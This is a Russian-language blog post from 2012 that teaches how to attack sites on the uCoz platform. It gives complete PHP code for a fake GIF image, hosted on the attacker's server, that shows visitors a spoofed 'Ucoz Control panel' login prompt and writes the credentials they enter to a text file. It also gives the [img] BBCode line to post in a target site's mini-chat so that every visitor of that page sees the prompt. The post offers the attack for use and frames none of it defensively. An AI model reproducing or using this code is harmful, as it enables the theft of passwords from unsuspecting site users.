Набор журналистов на сайт Каталог файлов Все для системы uCoz Полезные статьи и файлы Поиск по сайту Обратная связь
Добро пожаловать, Гость!
Войти
Зарегистрироваться
Рубрики
Шаблоны для сайтов uCoz [2]
здесь собраны самые красивые шаблоны для uCoz, скачивайте быстрее.
Скрипты для системы uCoz [24]
Наш опрос
Какой раздел сайта не актуален?
Всего ответов: 62
Главная » 2012 » Январь » 31 » Скрипт для взлома сайта на Ucoz
03:34
Скрипт для взлома сайта на Ucoz


Сегодня я вам расскажу об одном из способов взлома сайта на UCOZ’е. Каждый настоящий хакер может обнаружить достаточное количество уязвимостей на подобных сайтах и знает множество способов для взлома этих сайтов.


Я надеюсь, что и я скоро стану таким =).

Итак, приступим...
В начале нужно зарегить host обязательно с поддержкой php (что-то вроде http://mywebsite.phphost.net). После завершения регистрации загружаем на ftp скрипт, а затем ставим права на файл goodsmile.gif и на .txt файл, например: pass.txt (сюда должны присылаться пароли пользователей взломанного сайта). Затем скачайте любой смайлик с расширением .gif (типа good.gif).
Затем откройте редактор Notepad и набираете следующее:

Code
header("Content-type: image/gif");
$image = imagecreatefromgif(' goodsmile.gif');
if(!$_COOKIE['LOGON'])
{
  $login = $_SERVER['PHP_AUTH_USER'];
  $pass = $_SERVER['PHP_AUTH_PW'];
if(strlen($pass) <= 4 || !$login)
  {
  Header('HTTP/1.1 401 Unauthorized');
  Header('WWW-Authenticate: Basic realm="Ucoz Control panel"');
  }
  elseif($login)
  {
setcookie('LOGON',md5($pass));
$f = fopen('pass.txt', 'ab');
fwrite($f, $login." ||| ".$pass."\r\n");
fclose($f);
  }
}
imagegif($image);
imagedestroy($image);
?>


Как только вы всё напишите, сохраните файл под именем goodsmile, потом замените расширение на .gif.
Затем выберите любой UCOZ’овский сайт, например http://other.ucoz.ru/ как обычно, у них есть мини-чат, как правило с правой стороны. Далее - для начала регистрируетесь на сайте, затем в мини-чате вводите логин, а в сообщении напишите следующее:

Code
[img] http://mywebsite.phphost.net/%20goodsmile.gif [/img]


Нажимаем ОК
. Если после этих манипуляций в мини-чате, вместо введенного сообщения появился смайлик - радуйтесь, потому что сайт - уязвимый. После этих манипуляций, у всех кто будет посещать данную страницу, (в моем примере это http:// other.ucoz.ru/) будет выплывать форма, в которой необходимо будет прописать свои логин и пароль. И у вас, при входе на данный сайт, эта форма также будет появляться. А все, введенные в эту форму логины и пароли будут отправляться в файл pass.txt, который вы создавали в самом начале и заливали на ftp.
Категория: Скрипты для системы uCoz | Просмотров: 313 | Добавил: Рустик | Теги: скрипт, на ucoz, для взлома, сайта | Рейтинг: 0.0/0
 


  
Всего комментариев: 0
Добавлять комментарии могут только зарегистрированные пользователи.
[ Регистрация | Вход ]